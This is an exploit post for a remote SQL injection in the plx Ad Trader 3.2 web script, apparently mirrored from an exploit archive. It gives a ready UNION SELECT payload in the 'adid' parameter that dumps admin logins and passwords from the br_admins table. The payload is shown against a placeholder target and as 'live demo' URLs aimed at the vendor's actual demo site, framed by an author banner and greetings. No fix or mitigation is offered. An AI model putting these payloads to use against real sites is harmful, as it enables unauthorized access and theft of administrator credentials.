plx Ad Trader 3.2 (adid) Remote SQL Injection Vulnerability
发布时间(Published):2008-07-01
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ plx Ad Trader v3.2 SQL Injection Vulnerability
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Author: Hussin X @
@ @
@ Home : www.tryag.cc/cc @
@ @
@ email: darkangel_g85[at]Yahoo[DoT]com @
@ hussin.x[at]hotmail[DoT]com @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ HomE script : http://plxwebdev.com
@
@ DeMo : http://plxwebdev.com/demos/plxadtrader
@
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@
@
@
ExPloiT :
www.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins--
L!VE DEMO :
USER
http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
PASSWORD
http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--
@
@
@
@@@@@@@@@@@@@@@@@@@@@@@( Greetz )@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ TrYaG.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR @
@ @
@ str0ke / FAHD /Iraqihack / Silic0n @
@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@
// Sebug.net [ 2008-07-02 ]